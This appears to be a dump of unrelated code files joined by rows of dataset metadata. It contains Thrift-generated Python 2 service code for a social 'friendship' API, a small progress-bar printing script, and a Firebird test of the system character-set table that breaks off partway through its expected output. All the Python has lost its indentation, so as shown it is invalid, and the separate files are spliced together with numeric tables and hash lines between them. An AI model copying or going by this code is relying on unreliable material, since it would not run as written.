# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import fb303.FacebookService
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface(fb303.FacebookService.Iface):
"""
Service: SocialCoffeeService
"""
def ping(self):
"""
Returns a "pong" string.
@return
"pong" string.
@throws never
"""
pass
def get_friends(self, id):
"""
Returns a list of user's friends with provided ID.
@param id
The ID of the user for whom the list of the friends should be retrieved.
@return
The list of user's friends IDs. If user has no friends empty list is returned.
@throws SocialException <ul>
<li>if ID is null</li>
<li>if ID is not a number<li>
<li>if ID is a non positive number</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- id
"""
pass
def create_friendship(self, usera, userb):
"""
Asks the service to make a new multual friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation created a new relationship or relationship already existed.
"true" if operation created a new friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
pass
def remove_friendship(self, usera, userb):
"""
Asks the service to remove a new friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation removed an already existed relationship or operation did nothing.
"true" if operation removed an already existed friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
pass
class Client(fb303.FacebookService.Client, Iface):
"""
Service: SocialCoffeeService
"""
def __init__(self, iprot, oprot=None):
fb303.FacebookService.Client.__init__(self, iprot, oprot)
def ping(self):
"""
Returns a "pong" string.
@return
"pong" string.
@throws never
"""
self.send_ping()
return self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "ping failed: unknown result");
def get_friends(self, id):
"""
Returns a list of user's friends with provided ID.
@param id
The ID of the user for whom the list of the friends should be retrieved.
@return
The list of user's friends IDs. If user has no friends empty list is returned.
@throws SocialException <ul>
<li>if ID is null</li>
<li>if ID is not a number<li>
<li>if ID is a non positive number</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- id
"""
self.send_get_friends(id)
return self.recv_get_friends()
def send_get_friends(self, id):
self._oprot.writeMessageBegin('get_friends', TMessageType.CALL, self._seqid)
args = get_friends_args()
args.id = id
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_friends(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_friends_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_friends failed: unknown result");
def create_friendship(self, usera, userb):
"""
Asks the service to make a new multual friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation created a new relationship or relationship already existed.
"true" if operation created a new friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
self.send_create_friendship(usera, userb)
return self.recv_create_friendship()
def send_create_friendship(self, usera, userb):
self._oprot.writeMessageBegin('create_friendship', TMessageType.CALL, self._seqid)
args = create_friendship_args()
args.usera = usera
args.userb = userb
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_friendship(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_friendship_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "create_friendship failed: unknown result");
def remove_friendship(self, usera, userb):
"""
Asks the service to remove a new friendship relationship between users with IDs usera and userb.
It's an idempotent operation so it can be called multiple times.
@param usera
The ID of the user A.
@param userb
The ID of the user B.
@return
Boolean value indicating whether the operation removed an already existed relationship or operation did nothing.
"true" if operation removed an already existed friendship relationship, "false" otherwise.
@throws SocialException <ul>
<li>if any of IDs is null</li>
<li>if any of IDs is not a number<li>
<li>if any of IDs is a non positive number</li>
<li>if both of IDs are equal</li>
<li>if internall error occurs e.g. connection to a database could not be established</li>
</ul>
Parameters:
- usera
- userb
"""
self.send_remove_friendship(usera, userb)
return self.recv_remove_friendship()
def send_remove_friendship(self, usera, userb):
self._oprot.writeMessageBegin('remove_friendship', TMessageType.CALL, self._seqid)
args = remove_friendship_args()
args.usera = usera
args.userb = userb
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_remove_friendship(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = remove_friendship_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.ex is not None:
raise result.ex
raise TApplicationException(TApplicationException.MISSING_RESULT, "remove_friendship failed: unknown result");
class Processor(fb303.FacebookService.Processor, Iface, TProcessor):
def __init__(self, handler):
fb303.FacebookService.Processor.__init__(self, handler)
self._processMap["ping"] = Processor.process_ping
self._processMap["get_friends"] = Processor.process_get_friends
self._processMap["create_friendship"] = Processor.process_create_friendship
self._processMap["remove_friendship"] = Processor.process_remove_friendship
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
result.success = self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_friends(self, seqid, iprot, oprot):
args = get_friends_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_friends_result()
try:
result.success = self._handler.get_friends(args.id)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("get_friends", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_create_friendship(self, seqid, iprot, oprot):
args = create_friendship_args()
args.read(iprot)
iprot.readMessageEnd()
result = create_friendship_result()
try:
result.success = self._handler.create_friendship(args.usera, args.userb)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("create_friendship", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_remove_friendship(self, seqid, iprot, oprot):
args = remove_friendship_args()
args.read(iprot)
iprot.readMessageEnd()
result = remove_friendship_result()
try:
result.success = self._handler.remove_friendship(args.usera, args.userb)
except SocialException, ex:
result.ex = ex
oprot.writeMessageBegin("remove_friendship", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_friends_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.id = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_friends_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.I32, 1)
oprot.writeI32(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_friends_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.I32,None), None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in xrange(_size0):
_elem5 = iprot.readI32();
self.success.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_friends_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter6 in self.success:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_friendship_args:
"""
Attributes:
- usera
- userb
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'usera', None, None, ), # 1
(2, TType.I32, 'userb', None, None, ), # 2
)
def __init__(self, usera=None, userb=None,):
self.usera = usera
self.userb = userb
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.usera = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.userb = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_friendship_args')
if self.usera is not None:
oprot.writeFieldBegin('usera', TType.I32, 1)
oprot.writeI32(self.usera)
oprot.writeFieldEnd()
if self.userb is not None:
oprot.writeFieldBegin('userb', TType.I32, 2)
oprot.writeI32(self.userb)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_friendship_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_friendship_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_friendship_args:
"""
Attributes:
- usera
- userb
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'usera', None, None, ), # 1
(2, TType.I32, 'userb', None, None, ), # 2
)
def __init__(self, usera=None, userb=None,):
self.usera = usera
self.userb = userb
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.usera = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.userb = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_friendship_args')
if self.usera is not None:
oprot.writeFieldBegin('usera', TType.I32, 1)
oprot.writeI32(self.usera)
oprot.writeFieldEnd()
if self.userb is not None:
oprot.writeFieldBegin('userb', TType.I32, 2)
oprot.writeI32(self.userb)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class remove_friendship_result:
"""
Attributes:
- success
- ex
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'ex', (SocialException, SocialException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ex=None,):
self.success = success
self.ex = ex
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ex = SocialException()
self.ex.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('remove_friendship_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.ex is not None:
oprot.writeFieldBegin('ex', TType.STRUCT, 1)
self.ex.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 30.517354 | 188 | 0.666169 | 3,478 | 28,137 | 5.188327 | 0.067568 | 0.015794 | 0.025436 | 0.01995 | 0.874148 | 0.854142 | 0.839124 | 0.820338 | 0.809255 | 0.809255 | 0 | 0.006332 | 0.225433 | 28,137 | 921 | 189 | 30.550489 | 0.821648 | 0.006788 | 0 | 0.809211 | 1 | 0 | 0.029287 | 0.004027 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.006579 | 0.011513 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4e3173e4618c108c1544af980f164d2dfe4fd074 | 568 | py | Python | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | pre/progressbar.py | neenjaw/udemy-python-mega-course | ab1b31577542b510dc44e22e4cfc48515477af52 | [
"MIT"
] | null | null | null | from time import sleep
print('\r|______________________|', end = '\r')
sleep(0.1)
print('\r|H_____________________|', end = '\r')
sleep(0.1)
print('\r|HE____________________|', end = '\r')
sleep(0.1)
print('\r|HEL___________________|', end = '\r')
sleep(0.1)
print('\r|HELL__________________|', end='\r')
sleep(0.1)
print('\r|HELLO_________________|', end = '\r')
sleep(0.1)
print('\r|HELLO T_______________|', end = '\r')
sleep(0.1)
print('\r|HELLO TI______________|', end='\r')
sleep(0.1)
print('\r|HELLO TIM_____________|', end = '\r')
print()
| 27.047619 | 48 | 0.642606 | 76 | 568 | 2.710526 | 0.223684 | 0.262136 | 0.349515 | 0.38835 | 0.757282 | 0.757282 | 0.757282 | 0.427184 | 0 | 0 | 0 | 0.032064 | 0.121479 | 568 | 20 | 49 | 28.4 | 0.380762 | 0 | 0 | 0.421053 | 0 | 0 | 0.459854 | 0.284672 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.052632 | 0 | 0.052632 | 0.526316 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
9d7006be530437855b5d56aebd8a0442bef5f6f2 | 76,063 | py | Python | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2022-02-05T11:37:13.000Z | 2022-02-05T11:37:13.000Z | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-09-03T11:47:00.000Z | 2021-09-03T12:42:10.000Z | tests/functional/basic/db/test_02.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-06-30T14:14:16.000Z | 2021-06-30T14:14:16.000Z | #coding:utf-8
#
# id: functional.basic.db.02
# title: Empty DB - RDB$CHARACTER_SETS
# decription: Check the correct content of RDB$CHARACTER_SETS for empty database
# tracker_id:
# min_versions: []
# versions: 3.0
# qmid: functional.basic.db.db_02
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('RDB\\$SECURITY_CLASS[ ]+SQL\\$.*', '')]
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
set list on;
set blob all;
set count on;
select * from rdb$character_sets order by rdb$character_set_id;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
RDB$CHARACTER_SET_NAME NONE
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME NONE
RDB$CHARACTER_SET_ID 0
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$182
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME OCTETS
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME OCTETS
RDB$CHARACTER_SET_ID 1
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$183
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ASCII
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ASCII
RDB$CHARACTER_SET_ID 2
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$184
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME UNICODE_FSS
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME UNICODE_FSS
RDB$CHARACTER_SET_ID 3
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 3
RDB$SECURITY_CLASS SQL$185
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME UTF8
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME UTF8
RDB$CHARACTER_SET_ID 4
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 4
RDB$SECURITY_CLASS SQL$186
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME SJIS_0208
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME SJIS_0208
RDB$CHARACTER_SET_ID 5
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$187
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME EUCJ_0208
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME EUCJ_0208
RDB$CHARACTER_SET_ID 6
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$188
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS737
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS737
RDB$CHARACTER_SET_ID 9
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$208
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS437
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS437
RDB$CHARACTER_SET_ID 10
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$189
